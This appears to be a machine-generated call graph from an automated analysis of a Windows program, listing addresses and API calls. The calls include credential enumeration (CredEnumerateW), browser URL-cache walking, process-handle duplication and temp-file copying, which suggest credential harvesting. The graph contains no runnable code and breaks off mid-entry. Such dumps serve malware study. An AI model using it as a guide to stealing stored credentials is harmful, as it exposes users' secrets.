38111 40d75c WritePrivateProfileStringW 38109->38111 38110->38111 38112 40d758 38110->38112 38111->38112 38112->38069 38114 44db70 38113->38114 38115 40da8d memset 38114->38115 38116 40daac LoadStringW 38115->38116 38117 40dac6 38116->38117 38117->38116 38119 40dade 38117->38119 38129 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38117->38129 38119->37891 38120->38090 38121->38092 38122->38094 38123->38096 38124->38098 38125->38100 38126->38102 38127->38104 38128->38106 38129->38117 38140 409b98 GetFileAttributesW 38130->38140 38132 40daea 38133 40db63 38132->38133 38134 40daef wcscpy wcscpy GetPrivateProfileIntW 38132->38134 38133->37893 38141 40d65d GetPrivateProfileStringW 38134->38141 38136 40db3e 38142 40d65d GetPrivateProfileStringW 38136->38142 38138 40db4f 38143 40d65d GetPrivateProfileStringW 38138->38143 38140->38132 38141->38136 38142->38138 38143->38133 38179 40eaff 38144->38179 38148 411ae2 memset 38147->38148 38149 411b8f 38147->38149 38219 409bca GetModuleFileNameW 38148->38219 38161 411a8b 38149->38161 38151 411b0a wcsrchr 38152 411b22 wcscat 38151->38152 38153 411b1f 38151->38153 38220 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38152->38220 38153->38152 38155 411b67 38221 402afb 38155->38221 38159 411b7f 38277 40ea13 SendMessageW memset SendMessageW 38159->38277 38162 402afb 27 API calls 38161->38162 38163 411ac0 38162->38163 38164 4110dc 38163->38164 38165 41113e 38164->38165 38170 4110f0 38164->38170 38302 40969c LoadCursorW SetCursor 38165->38302 38167 411143 38303 4032b4 38167->38303 38321 444a54 38167->38321 38168 4110f7 _wcsicmp 38168->38170 38169 411157 38171 40ada2 _wcsicmp 38169->38171 38170->38165 38170->38168 38324 410c46 10 API calls 38170->38324 38174 411167 38171->38174 38172 4111af 38174->38172 38175 4111a6 qsort 38174->38175 38175->38172 38178->37975 38180 40eb10 38179->38180 38192 40e8e0 38180->38192 38183 40eb6c memcpy memcpy 38184 40ebb7 38183->38184 38184->38183 38185 40ebf2 ??2@YAPAXI ??2@YAPAXI 38184->38185 38188 40d134 16 API calls 38184->38188 38186 40ec2e ??2@YAPAXI 38185->38186 38189 40ec65 38185->38189 38186->38189 38188->38184 38189->38189 38202 40ea7f 38189->38202 38191 402f49 38191->37975 38193 40e8f2 38192->38193 38194 40e8eb ??3@YAXPAX 38192->38194 38195 40e900 38193->38195 38196 40e8f9 ??3@YAXPAX 38193->38196 38194->38193 38197 40e911 38195->38197 38198 40e90a ??3@YAXPAX 38195->38198 38196->38195 38199 40e931 ??2@YAPAXI ??2@YAPAXI 38197->38199 38200 40e921 ??3@YAXPAX 38197->38200 38201 40e92a ??3@YAXPAX 38197->38201 38198->38197 38199->38183 38200->38201 38201->38199 38203 40aa04 ??3@YAXPAX 38202->38203 38204 40ea88 38203->38204 38205 40aa04 ??3@YAXPAX 38204->38205 38206 40ea90 38205->38206 38207 40aa04 ??3@YAXPAX 38206->38207 38208 40ea98 38207->38208 38209 40aa04 ??3@YAXPAX 38208->38209 38210 40eaa0 38209->38210 38211 40a9ce 4 API calls 38210->38211 38212 40eab3 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eabd 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eac7 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40ead1 38217->38218 38218->38191 38219->38151 38220->38155 38278 40b2cc 38221->38278 38223 402b0a 38224 40b2cc 27 API calls 38223->38224 38225 402b23 38224->38225 38226 40b2cc 27 API calls 38225->38226 38227 402b3a 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b54 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b6b 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b82 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b99 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402bb0 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bc7 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bde 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bf5 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402c0c 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c23 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c3a 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c51 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c68 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c7f 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c99 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402cb3 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cd5 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cf0 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402d0b 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d26 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d3e 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d59 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d78 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d93 38274->38275 38276 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38275->38276 38276->38159 38277->38149 38281 40b58d 38278->38281 38280 40b2d1 38280->38223 38282 40b5a4 GetModuleHandleW FindResourceW 38281->38282 38283 40b62e 38281->38283 38284 40b5c2 LoadResource 38282->38284 38286 40b5e7 38282->38286 38283->38280 38285 40b5d0 SizeofResource LockResource 38284->38285 38284->38286 38285->38286 38286->38283 38294 40afcf 38286->38294 38288 40b608 memcpy 38297 40b4d3 memcpy 38288->38297 38290 40b61e 38298 40b3c1 18 API calls 38290->38298 38292 40b626 38299 40b04b 38292->38299 38295 40b04b ??3@YAXPAX 38294->38295 38296 40afd7 ??2@YAPAXI 38295->38296 38296->38288 38297->38290 38298->38292 38300 40b051 ??3@YAXPAX 38299->38300 38301 40b05f 38299->38301 38300->38301 38301->38283 38302->38167 38304 4032c4 38303->38304 38305 40b633 ??3@YAXPAX 38304->38305 38306 403316 38305->38306 38325 44553b 38306->38325 38310 403480 38521 40368c 15 API calls 38310->38521 38312 403489 38313 40b633 ??3@YAXPAX 38312->38313 38314 403495 38313->38314 38314->38169 38315 4033a9 memset memcpy 38316 4033ec wcscmp 38315->38316 38317 40333c 38315->38317 38316->38317 38317->38310 38317->38315 38317->38316 38519 4028e7 11 API calls 38317->38519 38520 40f508 6 API calls 38317->38520 38319 403421 _wcsicmp 38319->38317 38322 444a64 FreeLibrary 38321->38322 38323 444a83 38321->38323 38322->38323 38323->38169 38324->38170 38326 445548 38325->38326 38327 445599 38326->38327 38522 40c768 38326->38522 38328 4455a8 memset 38327->38328 38335 4457f2 38327->38335 38605 403988 38328->38605 38339 445854 38335->38339 38707 403e2d memset memset memset memset memset 38335->38707 38336 445672 38616 403fbe memset memset memset memset memset 38336->38616 38337 4458bb memset memset 38343 414c2e 16 API calls 38337->38343 38388 4458aa 38339->38388 38730 403c9c memset memset memset memset memset 38339->38730 38341 44595e memset memset 38348 414c2e 16 API calls 38341->38348 38342 4455e5 38342->38336 38351 44560f 38342->38351 38344 4458f9 38343->38344 38349 40b2cc 27 API calls 38344->38349 38346 445a00 memset memset 38753 414c2e 38346->38753 38347 445b22 38353 445bca 38347->38353 38354 445b38 memset memset memset 38347->38354 38358 44599c 38348->38358 38359 445909 38349->38359 38350 44557a 38385 44558c 38350->38385 38802 41366b FreeLibrary 38350->38802 38362 4087b3 338 API calls 38351->38362 38352 445849 38817 40b1ab ??3@YAXPAX ??3@YAXPAX 38352->38817 38360 445c8b memset memset 38353->38360 38427 445cf0 38353->38427 38363 445bd4 38354->38363 38364 445b98 38354->38364 38367 40b2cc 27 API calls 38358->38367 38368 409d1f 6 API calls 38359->38368 38371 414c2e 16 API calls 38360->38371 38361 44589f 38818 40b1ab ??3@YAXPAX ??3@YAXPAX 38361->38818 38369 445621 38362->38369 38377 414c2e 16 API calls 38363->38377 38364->38363 38373 445ba2 38364->38373 38370 4459ac 38367->38370 38381 445919 38368->38381 38803 4454bf 20 API calls 38369->38803 38383 409d1f 6 API calls 38370->38383 38384 445cc9 38371->38384 38890 4099c6 wcslen 38373->38890 38374 4456b2 38805 40b1ab ??3@YAXPAX ??3@YAXPAX 38374->38805 38376 40b2cc 27 API calls 38389 445a4f 38376->38389 38391 445be2 38377->38391 38378 403335 38518 4452e5 45 API calls 38378->38518 38379 445d3d 38411 40b2cc 27 API calls 38379->38411 38380 445d88 memset memset memset 38394 414c2e 16 API calls 38380->38394 38819 409b98 GetFileAttributesW 38381->38819 38382 445823 38382->38352 38393 4087b3 338 API calls 38382->38393 38395 4459bc 38383->38395 38396 409d1f 6 API calls 38384->38396 38589 444b06 38385->38589 38386 445879 38386->38361 38407 4087b3 338 API calls 38386->38407 38388->38337 38412 44594a 38388->38412 38768 409d1f wcslen wcslen 38389->38768 38400 40b2cc 27 API calls 38391->38400 38393->38382 38404 445dde 38394->38404 38886 409b98 GetFileAttributesW 38395->38886 38406 445ce1 38396->38406 38397 445bb3 38893 445403 memset 38397->38893 38398 445680 38398->38374 38639 4087b3 memset 38398->38639 38401 445bf3 38400->38401 38410 409d1f 6 API calls 38401->38410 38402 445928 38402->38412 38820 40b6ef 38402->38820 38413 40b2cc 27 API calls 38404->38413 38910 409b98 GetFileAttributesW 38406->38910 38407->38386 38421 445c07 38410->38421 38422 445d54 _wcsicmp 38411->38422 38412->38341 38426 4459ed 38412->38426 38425 445def 38413->38425 38414 4459cb 38414->38426 38435 40b6ef 252 API calls 38414->38435 38418 40b2cc 27 API calls 38419 445a94 38418->38419 38773 40ae18 38419->38773 38420 44566d 38420->38335 38690 413d4c 38420->38690 38431 445389 258 API calls 38421->38431 38432 445d71 38422->38432 38497 445d67 38422->38497 38424 445665 38804 40b1ab ??3@YAXPAX ??3@YAXPAX 38424->38804 38433 409d1f 6 API calls 38425->38433 38426->38346 38426->38347 38427->38378 38427->38379 38427->38380 38428 445389 258 API calls 38428->38353 38437 445c17 38431->38437 38911 445093 23 API calls 38432->38911 38440 445e03 38433->38440 38435->38426 38436 4456d8 38442 40b2cc 27 API calls 38436->38442 38443 40b2cc 27 API calls 38437->38443 38439 44563c 38439->38424 38445 4087b3 338 API calls 38439->38445 38912 409b98 GetFileAttributesW 38440->38912 38441 40b6ef 252 API calls 38441->38378 38447 4456e2 38442->38447 38448 445c23 38443->38448 38444 445d83 38444->38378 38445->38439 38806 413fa6 _wcsicmp _wcsicmp 38447->38806 38452 409d1f 6 API calls 38448->38452 38450 445e12 38457 445e6b 38450->38457 38463 40b2cc 27 API calls 38450->38463 38455 445c37 38452->38455 38453 445aa1 38456 445b17 38453->38456 38471 445ab2 memset 38453->38471 38484 409d1f 6 API calls 38453->38484 38780 40add4 38453->38780 38785 445389 38453->38785 38794 40ae51 38453->38794 38454 4456eb 38459 4456fd memset memset memset memset 38454->38459 38460 4457ea 38454->38460 38461 445389 258 API calls 38455->38461 38887 40aebe 38456->38887 38914 445093 23 API calls 38457->38914 38807 409c70 wcscpy wcsrchr 38459->38807 38810 413d29 38460->38810 38466 445c47 38461->38466 38467 445e33 38463->38467 38473 40b2cc 27 API calls 38466->38473 38474 409d1f 6 API calls 38467->38474 38469 445e7e 38470 445f67 38469->38470 38479 40b2cc 27 API calls 38470->38479 38475 40b2cc 27 API calls 38471->38475 38477 445c53 38473->38477 38478 445e47 38474->38478 38475->38453 38476 409c70 2 API calls 38480 44577e 38476->38480 38481 409d1f 6 API calls 38477->38481 38913 409b98 GetFileAttributesW 38478->38913 38483 445f73 38479->38483 38485 409c70 2 API calls 38480->38485 38486 445c67 38481->38486 38488 409d1f 6 API calls 38483->38488 38484->38453 38489 44578d 38485->38489 38490 445389 258 API calls 38486->38490 38487 445e56 38487->38457 38493 445e83 memset 38487->38493 38491 445f87 38488->38491 38489->38460 38496 40b2cc 27 API calls 38489->38496 38490->38353 38917 409b98 GetFileAttributesW 38491->38917 38495 40b2cc 27 API calls 38493->38495 38498 445eab 38495->38498 38499 4457a8 38496->38499 38497->38378 38497->38441 38500 409d1f 6 API calls 38498->38500 38501 409d1f 6 API calls 38499->38501 38502 445ebf 38500->38502 38503 4457b8 38501->38503 38504 40ae18 9 API calls 38502->38504 38809 409b98 GetFileAttributesW 38503->38809 38514 445ef5 38504->38514 38506 4457c7 38506->38460 38508 4087b3 338 API calls 38506->38508 38507 40ae51 9 API calls 38507->38514 38508->38460 38509 445f5c 38511 40aebe FindClose 38509->38511 38510 40add4 2 API calls 38510->38514 38511->38470 38512 40b2cc 27 API calls 38512->38514 38513 409d1f 6 API calls 38513->38514 38514->38507 38514->38509 38514->38510 38514->38512 38514->38513 38516 445f3a 38514->38516 38915 409b98 GetFileAttributesW 38514->38915 38916 445093 23 API calls 38516->38916 38518->38317 38519->38319 38520->38317 38521->38312 38523 40c775 38522->38523 38918 40b1ab ??3@YAXPAX ??3@YAXPAX 38523->38918 38525 40c788 38919 40b1ab ??3@YAXPAX ??3@YAXPAX 38525->38919 38527 40c790 38920 40b1ab ??3@YAXPAX ??3@YAXPAX 38527->38920 38529 40c798 38530 40aa04 ??3@YAXPAX 38529->38530 38531 40c7a0 38530->38531 38921 40c274 memset 38531->38921 38536 40a8ab 9 API calls 38537 40c7c3 38536->38537 38538 40a8ab 9 API calls 38537->38538 38539 40c7d0 38538->38539 38950 40c3c3 38539->38950 38543 40c877 38552 40bdb0 38543->38552 38544 40c86c 38992 4053fe 39 API calls 38544->38992 38546 40c7e5 38546->38543 38546->38544 38551 40c634 49 API calls 38546->38551 38975 40a706 38546->38975 38551->38546 39182 404363 38552->39182 38555 40bf5d 39202 40440c 38555->39202 38557 40bdee 38557->38555 38560 40b2cc 27 API calls 38557->38560 38558 40bddf CredEnumerateW 38558->38557 38561 40be02 wcslen 38560->38561 38561->38555 38563 40be1e 38561->38563 38562 40be26 _wcsncoll 38562->38563 38563->38555 38563->38562 38566 40be7d memset 38563->38566 38567 40bea7 memcpy 38563->38567 38568 40bf11 wcschr 38563->38568 38569 40b2cc 27 API calls 38563->38569 38571 40bf43 LocalFree 38563->38571 39205 40bd5d 28 API calls 38563->39205 39206 404423 38563->39206 38566->38563 38566->38567 38567->38563 38567->38568 38568->38563 38570 40bef6 _wcsnicmp 38569->38570 38570->38563 38570->38568 38571->38563 38572 4135f7 39219 4135e0 38572->39219 38575 40b2cc 27 API calls 38576 41360d 38575->38576 38577 40a804 8 API calls 38576->38577 38578 413613 38577->38578 38579 41361b 38578->38579 38580 41363e 38578->38580 38581 40b273 27 API calls 38579->38581 38582 4135e0 FreeLibrary 38580->38582 38583 413625 GetProcAddress 38581->38583 38584 413643 38582->38584 38583->38580 38585 413648 38583->38585 38584->38350 38586 413658 38585->38586 38587 4135e0 FreeLibrary 38585->38587 38586->38350 38588 413666 38587->38588 38588->38350 39222 4449b9 38589->39222 38592 444c1f 38592->38327 38593 4449b9 42 API calls 38595 444b4b 38593->38595 38594 444c15 38597 4449b9 42 API calls 38594->38597 38595->38594 39243 444972 GetVersionExW 38595->39243 38597->38592 38598 444b99 memcmp 38603 444b8c 38598->38603 38599 444c0b 39247 444a85 42 API calls 38599->39247 38603->38598 38603->38599 39244 444aa5 42 API calls 38603->39244 39245 40a7a0 GetVersionExW 38603->39245 39246 444a85 42 API calls 38603->39246 38606 40399d 38605->38606 39248 403a16 38606->39248 38608 403a09 39262 40b1ab ??3@YAXPAX ??3@YAXPAX 38608->39262 38610 403a12 wcsrchr 38610->38342 38611 4039a3 38611->38608 38614 4039f4 38611->38614 39259 40a02c CreateFileW 38611->39259 38614->38608 38615 4099c6 2 API calls 38614->38615 38615->38608 38617 414c2e 16 API calls 38616->38617 38618 404048 38617->38618 38619 414c2e 16 API calls 38618->38619 38620 404056 38619->38620 38621 409d1f 6 API calls 38620->38621 38622 404073 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 40408e 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 4040a6 38625->38626 38627 403af5 20 API calls 38626->38627 38628 4040ba 38627->38628 38629 403af5 20 API calls 38628->38629 38630 4040cb 38629->38630 39289 40414f memset 38630->39289 38632 404140 39303 40b1ab ??3@YAXPAX ??3@YAXPAX 38632->39303 38634 4040ec memset 38637 4040e0 38634->38637 38635 404148 38635->38398 38636 4099c6 2 API calls 38636->38637 38637->38632 38637->38634 38637->38636 38638 40a8ab 9 API calls 38637->38638 38638->38637 39316 40a6e6 WideCharToMultiByte 38639->39316 38641 4087ed 39317 4095d9 memset 38641->39317 38644 408953 38644->38398 38645 408809 memset memset memset memset memset 38646 40b2cc 27 API calls 38645->38646 38647 4088a1 38646->38647 38648 409d1f 6 API calls 38647->38648 38649 4088b1 38648->38649 38650 40b2cc 27 API calls 38649->38650 38651 4088c0 38650->38651 38652 409d1f 6 API calls 38651->38652 38653 4088d0 38652->38653 38654 40b2cc 27 API calls 38653->38654 38655 4088df 38654->38655 38656 409d1f 6 API calls 38655->38656 38657 4088ef 38656->38657 38658 40b2cc 27 API calls 38657->38658 38659 4088fe 38658->38659 38660 409d1f 6 API calls 38659->38660 38661 40890e 38660->38661 38662 40b2cc 27 API calls 38661->38662 38663 40891d 38662->38663 38664 409d1f 6 API calls 38663->38664 38665 40892d 38664->38665 39336 409b98 GetFileAttributesW 38665->39336 38691 40b633 ??3@YAXPAX 38690->38691 38692 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38691->38692 38693 413f00 Process32NextW 38692->38693 38694 413da5 OpenProcess 38693->38694 38695 413f17 CloseHandle 38693->38695 38696 413df3 memset 38694->38696 38701 413eb0 38694->38701 38695->38436 39628 413f27 38696->39628 38698 413ebf ??3@YAXPAX 38698->38701 38699 4099f4 3 API calls 38699->38701 38701->38693 38701->38698 38701->38699 38702 413e37 GetModuleHandleW 38703 413e1f 38702->38703 38704 413e46 GetProcAddress 38702->38704 38703->38702 39633 413959 38703->39633 39649 413ca4 38703->39649 38704->38703 38706 413ea2 CloseHandle 38706->38701 38708 414c2e 16 API calls 38707->38708 38709 403eb7 38708->38709 38710 414c2e 16 API calls 38709->38710 38711 403ec5 38710->38711 38712 409d1f 6 API calls 38711->38712 38713 403ee2 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 403efd 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403f15 38716->38717 38718 403af5 20 API calls 38717->38718 38719 403f29 38718->38719 38720 403af5 20 API calls 38719->38720 38721 403f3a 38720->38721 38722 40414f 33 API calls 38721->38722 38723 403f4f 38722->38723 38724 403faf 38723->38724 38726 403f5b memset 38723->38726 38728 4099c6 2 API calls 38723->38728 38729 40a8ab 9 API calls 38723->38729 39663 40b1ab ??3@YAXPAX ??3@YAXPAX 38724->39663 38726->38723 38727 403fb7 38727->38382 38728->38723 38729->38723 38731 414c2e 16 API calls 38730->38731 38732 403d26 38731->38732 38733 414c2e 16 API calls 38732->38733 38734 403d34 38733->38734 38735 409d1f 6 API calls 38734->38735 38736 403d51 38735->38736 38737 409d1f 6 API calls 38736->38737 38738 403d6c 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d84 38739->38740 38741 403af5 20 API calls 38740->38741 38742 403d98 38741->38742 38743 403af5 20 API calls 38742->38743 38744 403da9 38743->38744 38745 40414f 33 API calls 38744->38745 38746 403dbe 38745->38746 38747 403e1e 38746->38747 38748 403dca memset 38746->38748 38751 4099c6 2 API calls 38746->38751 38752 40a8ab 9 API calls 38746->38752 39664 40b1ab ??3@YAXPAX ??3@YAXPAX 38747->39664 38748->38746 38750 403e26 38750->38386 38751->38746 38752->38746 38754 414b81 9 API calls 38753->38754 38755 414c40 38754->38755 38756 414c73 memset 38755->38756 39665 409cea 38755->39665 38757 414c94 38756->38757 39668 414592 RegOpenKeyExW 38757->39668 38760 414c64 38760->38376 38762 414cc1 38763 414cf4 wcscpy 38762->38763 39669 414bb0 wcscpy 38762->39669 38763->38760 38765 414cd2 39670 4145ac RegQueryValueExW 38765->39670 38767 414ce9 RegCloseKey 38767->38763 38769 409d62 38768->38769 38770 409d43 wcscpy 38768->38770 38769->38418 38771 409719 2 API calls 38770->38771 38772 409d51 wcscat 38771->38772 38772->38769 38774 40aebe FindClose 38773->38774 38775 40ae21 38774->38775 38776 4099c6 2 API calls 38775->38776 38777 40ae35 38776->38777 38778 409d1f 6 API calls 38777->38778 38779 40ae49 38778->38779 38779->38453 38781 40ade0 38780->38781 38782 40ae0f 38780->38782 38781->38782 38783 40ade7 wcscmp 38781->38783 38782->38453 38783->38782 38784 40adfe wcscmp 38783->38784 38784->38782 38786 40ae18 9 API calls 38785->38786 38792 4453c4 38786->38792 38787 40ae51 9 API calls 38787->38792 38788 4453f3 38790 40aebe FindClose 38788->38790 38789 40add4 2 API calls 38789->38792 38791 4453fe 38790->38791 38791->38453 38792->38787 38792->38788 38792->38789 38793 445403 253 API calls 38792->38793 38793->38792 38795 40ae7b FindNextFileW 38794->38795 38796 40ae5c FindFirstFileW 38794->38796 38797 40ae94 38795->38797 38798 40ae8f 38795->38798 38796->38797 38800 40aeb6 38797->38800 38801 409d1f 6 API calls 38797->38801 38799 40aebe FindClose 38798->38799 38799->38797 38800->38453 38801->38800 38802->38385 38803->38439 38804->38420 38805->38420 38806->38454 38808 409c89 38807->38808 38808->38476 38809->38506 38811 413d39 38810->38811 38812 413d2f FreeLibrary 38810->38812 38813 40b633 ??3@YAXPAX 38811->38813 38812->38811 38814 413d42 38813->38814 38815 40b633 ??3@YAXPAX 38814->38815 38816 413d4a 38815->38816 38816->38335 38817->38339 38818->38388 38819->38402 38821 44db70 38820->38821 38822 40b6fc memset 38821->38822 38823 409c70 2 API calls 38822->38823 38824 40b732 wcsrchr 38823->38824 38825 40b743 38824->38825 38826 40b746 memset 38824->38826 38825->38826 38827 40b2cc 27 API calls 38826->38827 38828 40b76f 38827->38828 38829 409d1f 6 API calls 38828->38829 38830 40b783 38829->38830 39671 409b98 GetFileAttributesW 38830->39671 38832 40b792 38833 40b7c2 38832->38833 38834 409c70 2 API calls 38832->38834 39672 40bb98 38833->39672 38836 40b7a5 38834->38836 38838 40b2cc 27 API calls 38836->38838 38842 40b7b2 38838->38842 38839 40b837 FindCloseChangeNotification 38841 40b83e memset 38839->38841 38840 40b817 39706 409a45 GetTempPathW 38840->39706 39705 40a6e6 WideCharToMultiByte 38841->39705 38845 409d1f 6 API calls 38842->38845 38845->38833 38846 40b827 CopyFileW 38846->38841 38847 40b866 38848 444432 121 API calls 38847->38848 38849 40b879 38848->38849 38850 40bad5 38849->38850 38851 40b273 27 API calls 38849->38851 38852 40baeb 38850->38852 38853 40bade DeleteFileW 38850->38853 38854 40b89a 38851->38854 38855 40b04b ??3@YAXPAX 38852->38855 38853->38852 38856 438552 134 API calls 38854->38856 38857 40baf3 38855->38857 38858 40b8a4 38856->38858 38857->38412 38859 40bacd 38858->38859 38861 4251c4 137 API calls 38858->38861 38860 443d90 111 API calls 38859->38860 38860->38850 38884 40b8b8 38861->38884 38862 40bac6 39718 424f26 123 API calls 38862->39718 38863 40b8bd memset 39709 425413 17 API calls 38863->39709 38866 425413 17 API calls 38866->38884 38869 40a71b MultiByteToWideChar 38869->38884 38870 40a734 MultiByteToWideChar 38870->38884 38873 40b9b5 memcmp 38873->38884 38874 4099c6 2 API calls 38874->38884 38875 404423 37 API calls 38875->38884 38877 40bb3e memset memcpy 39719 40a734 MultiByteToWideChar 38877->39719 38878 4251c4 137 API calls 38878->38884 38881 40bb88 LocalFree 38881->38884 38884->38862 38884->38863 38884->38866 38884->38869 38884->38870 38884->38873 38884->38874 38884->38875 38884->38877 38884->38878 38885 40ba5f memcmp 38884->38885 39710 4253ef 16 API calls 38884->39710 39711 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38884->39711 39712 4253af 17 API calls 38884->39712 39713 4253cf 17 API calls 38884->39713 39714 447280 memset 38884->39714 39715 447960 memset memcpy memcpy memcpy 38884->39715 39716 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38884->39716 39717 447920 memcpy memcpy memcpy 38884->39717 38885->38884 38886->38414 38888 40aed1 38887->38888 38889 40aec7 FindClose 38887->38889 38888->38347 38889->38888 38891 4099d7 38890->38891 38892 4099da memcpy 38890->38892 38891->38892 38892->38397 38894 40b2cc 27 API calls 38893->38894 38895 44543f 38894->38895 38896 409d1f 6 API calls 38895->38896 38897 44544f 38896->38897 39811 409b98 GetFileAttributesW 38897->39811 38899 44545e 38900 445476 38899->38900 38901 40b6ef 252 API calls 38899->38901 38902 40b2cc 27 API calls 38900->38902 38901->38900 38903 445482 38902->38903 38904 409d1f 6 API calls 38903->38904 38905 445492 38904->38905 39812 409b98 GetFileAttributesW 38905->39812 38907 4454a1 38908 4454b9 38907->38908 38909 40b6ef 252 API calls 38907->38909 38908->38428 38909->38908 38910->38427 38911->38444 38912->38450 38913->38487 38914->38469 38915->38514 38916->38514 38917->38497 38918->38525 38919->38527 38920->38529 38922 414c2e 16 API calls 38921->38922 38923 40c2ae 38922->38923 38993 40c1d3 38923->38993 38928 40c3be 38945 40a8ab 38928->38945 38929 40afcf 2 API calls 38930 40c2fd FindFirstUrlCacheEntryW 38929->38930 38931 40c3b6 38930->38931 38932 40c31e wcschr 38930->38932 38933 40b04b ??3@YAXPAX 38931->38933 38934 40c331 38932->38934 38935 40c35e FindNextUrlCacheEntryW 38932->38935 38933->38928 38936 40a8ab 9 API calls 38934->38936 38935->38932 38937 40c373 GetLastError 38935->38937 38940 40c33e wcschr 38936->38940 38938 40c3ad FindCloseUrlCache 38937->38938 38939 40c37e 38937->38939 38938->38931 38941 40afcf 2 API calls 38939->38941 38940->38935 38942 40c34f 38940->38942 38943 40c391 FindNextUrlCacheEntryW 38941->38943 38944 40a8ab 9 API calls 38942->38944 38943->38932 38943->38938 38944->38935 39109 40a97a 38945->39109 38948 40a8cc 38948->38536 38949 40a8d0 7 API calls 38949->38948 39114 40b1ab ??3@YAXPAX ??3@YAXPAX 38950->39114 38952 40c3dd 38953 40b2cc 27 API calls 38952->38953 38954 40c3e7 38953->38954 39115 414592 RegOpenKeyExW 38954->39115 38956 40c3f4 38957 40c50e 38956->38957 38958 40c3ff 38956->38958 38972 405337 38957->38972 38959 40a9ce 4 API calls 38958->38959 38960 40c418 memset 38959->38960 39116 40aa1d 38960->39116 38963 40c471 38965 40c47a _wcsupr 38963->38965 38964 40c505 RegCloseKey 38964->38957 38966 40a8d0 7 API calls 38965->38966 38967 40c498 38966->38967 38968 40a8d0 7 API calls 38967->38968 38969 40c4ac memset 38968->38969 38970 40aa1d 38969->38970 38971 40c4e4 RegEnumValueW 38970->38971 38971->38964 38971->38965 39118 405220 38972->39118 38976 4099c6 2 API calls 38975->38976 38977 40a714 _wcslwr 38976->38977 38978 40c634 38977->38978 39175 405361 38978->39175 38981 40c65c wcslen 39178 4053b6 39 API calls 38981->39178 38982 40c71d wcslen 38982->38546 38984 40c713 39181 4053df 39 API calls 38984->39181 38985 40c677 38985->38984 39179 40538b 39 API calls 38985->39179 38988 40c6a5 38988->38984 38989 40c6a9 memset 38988->38989 38990 40c6d3 38989->38990 39180 40c589 43 API calls 38990->39180 38992->38543 38994 40ae18 9 API calls 38993->38994 39000 40c210 38994->39000 38995 40ae51 9 API calls 38995->39000 38996 40c264 38997 40aebe FindClose 38996->38997 38999 40c26f 38997->38999 38998 40add4 2 API calls 38998->39000 39005 40e5ed memset memset 38999->39005 39000->38995 39000->38996 39000->38998 39001 40c231 _wcsicmp 39000->39001 39002 40c1d3 35 API calls 39000->39002 39001->39000 39003 40c248 39001->39003 39002->39000 39018 40c084 22 API calls 39003->39018 39006 414c2e 16 API calls 39005->39006 39007 40e63f 39006->39007 39008 409d1f 6 API calls 39007->39008 39009 40e658 39008->39009 39019 409b98 GetFileAttributesW 39009->39019 39011 40e667 39012 40e680 39011->39012 39014 409d1f 6 API calls 39011->39014 39020 409b98 GetFileAttributesW 39012->39020 39014->39012 39015 40e68f 39016 40c2d8 39015->39016 39021 40e4b2 39015->39021 39016->38928 39016->38929 39018->39000 39019->39011 39020->39015 39042 40e01e 39021->39042 39023 40e593 39025 40e5b0 39023->39025 39026 40e59c DeleteFileW 39023->39026 39024 40e521 39024->39023 39065 40e175 39024->39065 39027 40b04b ??3@YAXPAX 39025->39027 39026->39025 39028 40e5bb 39027->39028 39030 40e5c4 CloseHandle 39028->39030 39031 40e5cc 39028->39031 39030->39031 39033 40b633 ??3@YAXPAX 39031->39033 39032 40e573 39034 40e584 39032->39034 39035 40e57c FindCloseChangeNotification 39032->39035 39036 40e5db 39033->39036 39108 40b1ab ??3@YAXPAX ??3@YAXPAX 39034->39108 39035->39034 39039 40b633 ??3@YAXPAX 39036->39039 39038 40e540 39038->39032 39085 40e2ab 39038->39085 39040 40e5e3 39039->39040 39040->39016 39043 406214 22 API calls 39042->39043 39044 40e03c 39043->39044 39045 40e16b 39044->39045 39046 40dd85 74 API calls 39044->39046 39045->39024 39047 40e06b 39046->39047 39047->39045 39048 40afcf ??2@YAPAXI ??3@YAXPAX 39047->39048 39049 40e08d OpenProcess 39048->39049 39050 40e0a4 GetCurrentProcess DuplicateHandle 39049->39050 39054 40e152 39049->39054 39051 40e0d0 GetFileSize 39050->39051 39052 40e14a CloseHandle 39050->39052 39055 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39051->39055 39052->39054 39053 40e160 39057 40b04b ??3@YAXPAX 39053->39057 39054->39053 39056 406214 22 API calls 39054->39056 39058 40e0ea 39055->39058 39056->39053 39057->39045 39059 4096dc CreateFileW 39058->39059 39060 40e0f1 CreateFileMappingW 39059->39060 39061 